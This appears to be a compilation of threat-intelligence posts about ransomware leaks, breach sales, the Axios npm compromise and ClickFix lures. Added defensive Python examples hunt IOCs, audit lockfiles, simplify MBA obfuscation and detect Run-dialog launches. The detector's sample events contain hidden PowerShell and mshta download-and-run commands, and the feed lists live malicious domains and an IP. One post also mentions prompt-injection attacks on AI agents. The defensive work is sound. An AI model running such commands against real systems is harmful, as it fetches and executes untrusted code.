🚨 DragonForce just dropped 3 new victims on their leak portal (Apr 4):
🇹🇭 Siam Okamura International - office furniture - 368.7 GB
🇻🇳 Vietnam Fortress Tools JSC - industrial tools - 402.33 GB
🇪🇬 AUG Pharma - pharma - 890.34 GB
~1.66 TB total. Mama mia.
#Ransomware #DragonForce #CTI #ThreatIntel
Created two threat intelligence accounts, one on Bluesky and the other on X, so that I can provide new threat reports as a feed. Check them out at:
BSky - bsky.app/profile/inte...
X - x.com/ORIntelligence
#ThreatIntel #InfoSec
Wahoo! Nova group allegedly hit EMCO Electric International, a manufacturer of electrical installation products. Clients in sensitive sectors like food, pharma, and water treatment could face supply chain risks. 🚨 #Manufacturing #DataBreach #CTI #ThreatIntel
Third critical vulnerability in a major cloud data platform this quarter.
www.yazoul.net/advisory/cve/cve-2026-33...
#InfoSec #ThreatIntel
~Zscaler~
Axios (NPM) and LiteLLM (PyPI) packages were compromised to distribute RATs and harvest cloud secrets.
-
IOCs: sfrclak[.]com, 142[.]11[.]206[.]73
-
#Malware #SupplyChain #ThreatIntel
~Varonis~
Anthropic accidentally leaked the Claude Code CLI source via an npm package, exposing internal architecture and guardrails.
-
IOCs: @anthropic-ai/claude-code@2.1.88
-
#AI #DataLeak #ThreatIntel
~Trendmicro~
Actors are exploiting the Claude Code source leak to distribute Vidar stealer via fake GitHub repositories.
-
IOCs: rti[.]cargomanbd[.]com, pastebin[.]com/raw/mcwWi1Ue, snippet[.]host/efguhk/raw
-
#Malware #ThreatIntel #Vidar
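The IOC lines in these summaries are defanged in two different styles ("sfrclak. com" with spaces, "142[. ]11[. ]206[. ]73" with brackets), so they cannot be pasted straight into a search. The block below is an added example, not code from Zscaler, Talos or Trend Micro: it refangs the indicators quoted in the posts above, classifies each as an IP, domain or URL, and matches them against a proxy log. The log lines are constructed for the example; the log layout (timestamp, client IP, method, URL, status) is an assumption you will need to adapt to your own source.

```python
"""Refang the defanged IOCs from the feed and hunt for them in a proxy log."""
import re
from urllib.parse import urlsplit

# Copied from the Zscaler, Talos and Trend Micro summaries above, as defanged there.
FEED_IOCS = [
    "sfrclak[.]com",
    "142[.]11[.]206[.]73",
    "rti[.]cargomanbd[.]com",
    "pastebin[.]com/raw/mcwWi1Ue",
    "snippet[.]host/efguhk/raw",
]

_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def refang(ioc):
    """Undo the usual defanging conventions: [.] (.) {.}, 'dot space', hxxp."""
    s = ioc.strip()
    s = re.sub(r"[\[({]\s*\.\s*[\])}]", ".", s)        # "[.]" and "[. ]"
    s = re.sub(r"(?<=\w)\.\s+(?=\w)", ".", s)          # "sfrclak. com", "142. 11. 206. 73"
    s = re.sub(r"\bhxxp(s?)://", r"http\1://", s, flags=re.I)
    return s


def parse_ioc(ioc):
    """Classify a refanged IOC as ('ip' | 'domain' | 'url', host, path).

    Only the host is lowercased; URL paths (pastebin raw IDs) are case-sensitive.
    """
    s = refang(ioc)
    if "://" in s:
        parts = urlsplit(s)
        host, path = (parts.hostname or ""), parts.path
    else:
        host, _, rest = s.partition("/")
        path = "/" + rest if rest else ""
    host = host.lower()
    if path:
        return ("url", host, path)
    if _IPV4.match(host):
        return ("ip", host, "")
    return ("domain", host, "")


def host_matches(host, ioc_host):
    """Exact or subdomain match only: 'notsfrclak.com' must NOT match 'sfrclak.com'."""
    return host == ioc_host or host.endswith("." + ioc_host)


def scan_proxy_log(log_text, iocs):
    """Return [(timestamp, client_ip, matched_ioc)] for lines whose URL hits an IOC.

    Assumed line layout (constructed for this example):
        <timestamp> <client-ip> <method> <url> <status>
    """
    parsed = [(ioc, parse_ioc(ioc)) for ioc in iocs]
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        ts, client, url = fields[0], fields[1], fields[3]
        u = urlsplit(url)
        host, path = (u.hostname or "").lower(), u.path   # hostname drops any :port
        for raw, (kind, ioc_host, ioc_path) in parsed:
            if not host_matches(host, ioc_host):
                continue
            if kind == "url" and not path.startswith(ioc_path):
                continue
            hits.append((ts, client, raw))
            break  # one verdict per line is enough
    return hits


# Constructed sample log: one clean line, one look-alike domain, four true hits.
SAMPLE_LOG = """\
2026-04-03T10:01:12Z 10.0.0.5 GET https://www.example.com/ 200
2026-04-03T10:02:44Z 10.0.0.7 GET https://pastebin.com/raw/mcwWi1Ue 200
2026-04-03T10:03:01Z 10.0.0.7 POST http://142.11.206.73:8080/c 200
2026-04-03T10:04:09Z 10.0.0.9 GET https://rti.cargomanbd.com/update.exe 200
2026-04-03T10:05:30Z 10.0.0.9 GET https://notsfrclak.com/ 200
2026-04-03T10:06:15Z 10.0.0.11 GET https://cdn.sfrclak.com/a.js 200
"""

if __name__ == "__main__":
    for ts, client, ioc in scan_proxy_log(SAMPLE_LOG, FEED_IOCS):
        print(f"{ts} {client} -> {ioc}")
```

The subdomain rule and the path prefix rule are the two places a naive `in` check goes wrong: a substring match would both miss `cdn.sfrclak.com` (if you compared whole hosts) and false-positive on `notsfrclak.com`, and a pastebin IOC is only meaningful with its raw-paste path, since pastebin.com itself is not hostile.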
~Paloalto~
Researchers demonstrated prompt injection attacks on Amazon Bedrock multi-agent apps to extract instructions and misuse tools, mitigated by built-in guardrails.
-
IOCs: (None identified)
-
#AI #PromptInjection #ThreatIntel
~Elastic~
Elastic announced 9 new security integrations for Q1 2026, including macOS, QRadar, and AWS Security Hub.
-
IOCs: (None identified)
-
#ElasticSecurity #SIEM #ThreatIntel
~Talos~
Malicious Axios npm packages (v1.14.1, v0.30.4) were deployed to deliver a RAT and steal credentials.
-
IOCs: 142[.]11[.]206[.]73, sfrclak[.]com
-
#SupplyChain #ThreatIntel #npm
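The Zscaler and Talos summaries above name the two malicious axios releases (1.14.1 and 0.30.4), and the Socket post explains how they got published. The first thing a practitioner needs is a fast answer to "is that version pinned anywhere in my tree, including as a transitive dependency?". The block below is an added example, not code from Talos, Socket, Zscaler or the axios project: it walks a `package-lock.json` (both the flat v2/v3 map and the nested v1 tree) and a pinned `requirements.txt`/`pip freeze` listing against a blocklist. The axios versions come from the posts; the compromised LiteLLM release is not named on this page, so the PyPI table is deliberately left empty. The sample lockfile is constructed.

```python
"""Audit npm and pip lockfiles for package versions known to be malicious."""
import json
import re

MALICIOUS = {
    "npm": {"axios": {"1.14.1", "0.30.4"}},   # versions named in the feed above
    "pypi": {},   # PEP 503-normalized names; fill from the LiteLLM advisory (not given on this page)
}

# name[extras]==version, tolerating trailing markers/comments
_PIN = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*==\s*([^\s;#]+)")


def audit_npm_lock(lock_text, blocklist=MALICIOUS):
    """Return [(name, version, path)] for every flagged entry in a package-lock.json.

    Nested copies are reported too: a transitive dependency can pin a bad
    version even when the top-level copy is clean.
    """
    lock = json.loads(lock_text)
    bad = blocklist["npm"]
    hits = []

    packages = lock.get("packages")
    if packages is not None:  # lockfileVersion 2/3: flat map keyed by install path
        for path, info in packages.items():
            if not path:
                continue  # "" is the root project itself
            name = info.get("name") or path.rsplit("node_modules/", 1)[-1]  # keeps @scope/name
            version = info.get("version", "")
            if version in bad.get(name, ()):
                hits.append((name, version, path))
        return hits

    def walk(deps, prefix):  # lockfileVersion 1: nested "dependencies" tree
        for name, info in deps.items():
            path = f"{prefix}node_modules/{name}"
            version = info.get("version", "")
            if version in bad.get(name, ()):
                hits.append((name, version, path))
            walk(info.get("dependencies", {}), path + "/")

    walk(lock.get("dependencies", {}), "")
    return hits


def normalize_pypi_name(name):
    """PEP 503 normalization: Example_Pkg, example.pkg and example-pkg compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_requirements(text, blocklist=MALICIOUS):
    """Return [(name, version, line)] for pinned (name==version) lines that are flagged.

    Ranged or unpinned specifiers are ignored: they do not say what is installed.
    """
    bad = blocklist["pypi"]
    hits = []
    for line in text.splitlines():
        m = _PIN.match(line)
        if not m:
            continue
        name, version = normalize_pypi_name(m.group(1)), m.group(2)
        if version in bad.get(name, ()):
            hits.append((name, version, line.strip()))
    return hits


# Constructed sample: top-level axios is the bad release, a nested copy is not.
SAMPLE_LOCK = json.dumps({
    "name": "demo",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/legacy-client": {"version": "2.0.0"},
        "node_modules/legacy-client/node_modules/axios": {"version": "1.13.0"},
        "node_modules/follow-redirects": {"version": "1.15.9"},
    },
})

if __name__ == "__main__":
    for name, version, path in audit_npm_lock(SAMPLE_LOCK):
        print(f"FLAGGED {name}@{version} at {path}")
```

A clean lockfile is not the end of the check: if a CI runner or developer machine ever installed the flagged version, its install scripts have already run, so the network IOCs in the same posts (the 142.11.206.73 address and sfrclak.com) need to be hunted in proxy and DNS logs as well.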
~Talos~
Recent major supply chain attacks target popular libraries like Axios and GitHub repos, highlighting the need for robust CI/CD security.
-
IOCs: Txt.Trojan.TeamPCP-10059839-0, React2Shell
-
#SupplyChain #TeamPCP #ThreatIntel
~Socket~
Axios maintainer confirms a targeted social engineering attack hijacked active sessions to publish a remote access trojan to npm.
-
IOCs: (None identified)
-
#SupplyChain #ThreatIntel #npm
🚨 #DataBreach | lit.it (Italy) - crypto video platform - reportedly hit in Feb 2026. ~300K user records freely dumped: full names, emails, usernames.
Actor "xorcat" dropped this at no charge. No ransom, no price tag.
Stay sharp.
#CTI #ThreatIntel #InfoSec
Waaaah! #DataBreach | actor "gtaviispeak" selling ~243k records from clickitsolutions.it (Italy).
Full CRM dump: fiscal codes, encrypted passwords, payment data, billing/shipping addresses & internal ticket notes.
On sale now.
🚨 #CTI #ThreatIntel
MISP now supports rich geolocation visualisation for objects containing geographic data. When enabled, geolocation objects display an interactive map icon that renders coordinates on a tile-based map.
We are happy to announce the release of MISP v2.5.36, which includes new geolocation and map visualisation capabilities, the continued development of the Overmind UI, a new interactive CLI shell UI, important security fixes, and installer improvements […]
[Original post on infosec.exchange]
~Akamai~
HHS HIPAA updates stress that healthcare must adopt microsegmentation to contain ransomware blast radiuses, as compliance alone is insufficient.
-
IOCs: (None identified)
-
#Healthcare #Ransomware #ThreatIntel
Latest Threat Intelligence Briefing for cyber operations with Russia, China, North Korea, and Iran #cybersecurity #iran #russia #china #northkorea #threatintel
CYBER THREAT INTELLIGENCE BRIEFING open.substack.com/pub/cyberwar...
~Trendmicro~
Threat actors are exploiting an accidental Claude Code source leak to distribute Vidar stealer and GhostSocks malware via fake GitHub repositories.
-
IOCs: TradeAI.exe, Vidar Stealer, GhostSocks
-
#Malware #Vidar #threatintel
~Trailofbits~
Trail of Bits released CoBRA, an open-source tool that simplifies 99.8% of Mixed Boolean-Arithmetic (MBA) obfuscation used in malware.
-
IOCs: (None identified)
-
#Malware #ReverseEngineering #ThreatIntel
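Mixed Boolean-Arithmetic obfuscation replaces a plain operation such as `x + y` with an equivalent but unreadable mix of arithmetic and bitwise terms, and the reverse-engineer's job is to recover the plain form. The block below is an added example illustrating that idea; it is not CoBRA and does not reproduce its algorithm. It keeps a small table of plain operations and a few hand-written MBA rewrites of the kind obfuscators emit, proves or refutes equivalence by exhaustively evaluating both sides over every 8-bit operand pair (all arithmetic mod 2**bits, as the machine code computes it), and "simplifies" an expression by finding the plain entry it is equivalent to. Expressions are Python lambdas; the `bits` parameter is an assumption for the example.

```python
"""Check and simplify Mixed Boolean-Arithmetic (MBA) rewrites by exhaustive evaluation."""
import itertools

# Plain operations an analyst wants to recover from obfuscated code.
PLAIN = {
    "x + y": lambda x, y: x + y,
    "x - y": lambda x, y: x - y,
    "x & y": lambda x, y: x & y,
    "x | y": lambda x, y: x | y,
    "x ^ y": lambda x, y: x ^ y,
}

# Hand-written rewrites (not from CoBRA's corpus). The last one is deliberately
# NOT an identity, to show that the checker refutes as well as confirms.
OBFUSCATED = {
    "(x ^ y) + 2*(x & y)":   lambda x, y: (x ^ y) + 2 * (x & y),
    "(x ^ -y) + 2*(x & -y)": lambda x, y: (x ^ -y) + 2 * (x & -y),
    "(x + y) - (x | y)":     lambda x, y: (x + y) - (x | y),
    "(x + y) - (x & y)":     lambda x, y: (x + y) - (x & y),
    "(x | y) - (x & y)":     lambda x, y: (x | y) - (x & y),
    "(x | y) + (x ^ y)":     lambda x, y: (x | y) + (x ^ y),
}


def equivalent(f, g, bits=8):
    """Compare f and g on every (x, y) pair of the given width.

    Python ints are unbounded, so each side is masked to `bits` at the end;
    because +, -, *, &, |, ^ and ~ all respect congruence mod 2**bits, this
    equals what an n-bit register would hold. Returns (True, None) or
    (False, counterexample).
    """
    mask = (1 << bits) - 1
    for x, y in itertools.product(range(1 << bits), repeat=2):
        if (f(x, y) & mask) != (g(x, y) & mask):
            return False, (x, y)
    return True, None


def simplify(expr_fn, bits=8):
    """Return the name of the plain operation expr_fn is equivalent to, or None."""
    for name, plain_fn in PLAIN.items():
        ok, _ = equivalent(expr_fn, plain_fn, bits)
        if ok:
            return name
    return None


if __name__ == "__main__":
    for text, fn in OBFUSCATED.items():
        print(f"{text:26s} -> {simplify(fn)}")
```

Exhaustive 8-bit evaluation is a sanity check, not a proof for 32- or 64-bit code in general; for the linear class of MBA (sums of bitwise terms with constant coefficients) the standard result is that equivalence over single-bit inputs already implies equivalence at every width, which is why tools can afford an exact decision procedure there, while non-linear MBA needs the heavier machinery a tool like CoBRA brings.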
Cybercrime is evolving beyond digital.
Vacant homes + mail systems are being used to intercept sensitive data and enable fraud.
No malware. Just system abuse.
Follow TechNadu & join the discussion
#CyberSecurity #Infosec #Fraud #ThreatIntel
Government fraud gets framed like a stack of scams. Cleaner lie. The real problem looks more like identity infrastructure with a payout engine attached. Same weak proofing, same rails, same movie, different claim form.
Read it here: blog.alphahunt.io/the-real-gov...
#AlphaHunt #ThreatIntel
🚨 CVE Weekly Roundup | 2026-03-26 to 2026-04-02
1,045 CVEs tracked (+184 vs last week)
⚠️ 3 actively exploited (0.3%)
🔴 86 critical (CVSS 9.0+)
Our weekly threat breakdown: what actually matters this week
#cybersecurity #CVE #threatintel #infosec
breachandbuild.com/cve-exploita...
Holiday weekend oopsie in CUPS:
github.com/OpenPrinting/cups/securi...
Just as well no-one prints any more...
#cups, #threatintel
~Trendmicro~
The White House released a new National Cyber Strategy focusing on 6 pillars including AI, critical infrastructure, and cyber talent.
-
IOCs: (None identified)
-
#CyberStrategy #Policy #threatintel
~Talos~
AI lowers the barrier for BEC attacks, while a massive campaign exploits Next.js React2Shell to harvest cloud credentials.
-
IOCs: CVE-2025-55182
-
#BEC #React2Shell #ThreatIntel
~Socket~
Node.js has paused its bug bounty program following the suspension of the Internet Bug Bounty (IBB) funding initiative.
-
IOCs: (None identified)
-
#BugBounty #NodeJS #ThreatIntel
~Cisa~
CISA added CVE-2026-3502, a TrueConf Client integrity check flaw, to its KEV catalog due to active exploitation.
-
IOCs: CVE-2026-3502
-
#CISA #CVE2026_3502 #threatintel
Here are the #Top10 trending hashtags on #Bluesky the past hour:
#ransomware #threatintel #crackcodes #epsteinweb #tg #art #nowplaying #trump #iran #trumpstariffscostus
Powered by https://getskyscraper.com
Because the user manually initiates the execution through the native Windows Run dialog, this tactic frequently bypasses standard EDR behavioral alerts.
#InfoSec #CyberSecurity #RedTeam #Malware #Infostealer #Technology #Microsoft #ClickFix #Armada #ArmadaOps #Hacking #ThreatIntel
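The point of the post above is that a ClickFix lure gets the victim to paste a command into the Run dialog themselves, so the usual "suspicious child of a browser or Office process" heuristic never fires. What does survive is the process lineage (a script host spawned by explorer.exe with hide-window or download switches) and the Run dialog's own history, which Windows writes to HKCU\...\Explorer\RunMRU. The block below is an added example, not from the Armada/ArmadaOps post: it applies those two checks to Sysmon-style events (Event ID 1 process creation and Event ID 13 registry value set) that are constructed inline as dicts; the field names follow Sysmon's, but treating parsed events as dicts is an assumption for the example.

```python
"""Flag Run-dialog (Win+R) launches that look like ClickFix, from Sysmon-style events."""
import re

# Script hosts and LOLBins that ClickFix lures typically ask the victim to run.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "msiexec.exe", "certutil.exe", "bitsadmin.exe",
}

# Switches and verbs that turn a plain interpreter launch into a download-and-run.
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|\biex\b|invoke-expression"
    r"|downloadstring|downloadfile|https?://|\bmshta\s+\S+",
    re.I,
)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return a finding string for one event, or None if it is benign."""
    eid = event.get("EventID")
    if eid == 1:  # process creation
        image = _basename(event.get("Image", ""))
        parent = _basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        # Run dialog launches are children of explorer.exe, not of a browser or Office app.
        if parent == "explorer.exe" and image in INTERPRETERS and SUSPICIOUS_ARGS.search(cmd):
            return f"run-dialog launch: {image} <- {parent}: {cmd}"
    elif eid == 13:  # registry value set
        target = event.get("TargetObject", "")
        details = event.get("Details", "").lower()
        # RunMRU keeps what the user typed into Win+R (Windows appends "\1" to each entry).
        if "\\explorer\\runmru\\" in target.lower():
            names = ("powershell", "pwsh", "mshta", "cmd", "curl", "certutil", "bitsadmin")
            if any(n in details for n in names) and SUSPICIOUS_ARGS.search(details):
                return f"RunMRU entry: {event.get('Details', '')}"
    return None


def run(events):
    """Return all findings, in event order."""
    return [f for f in (evaluate(e) for e in events) if f]


# Constructed sample events. 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://203.0.113.10/a.ps1 | iex"'},
    {"EventID": 1,  # same switches, but spawned by PowerShell itself: not a Run-dialog launch
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c Get-Date"},
    {"EventID": 1,  # ordinary explorer child
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": r"mshta http://203.0.113.10/verify.hta\1"},
    {"EventID": 13,  # a user opening a plain command prompt: no download/hide indicator
     "TargetObject": r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\b",
     "Details": r"cmd\1"},
]

if __name__ == "__main__":
    for finding in run(SAMPLE_EVENTS):
        print(finding)
```

The RunMRU rule is the one that catches the "user did it themselves" case an EDR behavioural model discounts, and requiring a download or hide indicator on top of the interpreter name keeps a plain `cmd` typed into Win+R from paging anyone. Sysmon only records Event ID 13 for keys your configuration includes, so RunMRU has to be in the config for that half of the detection to exist.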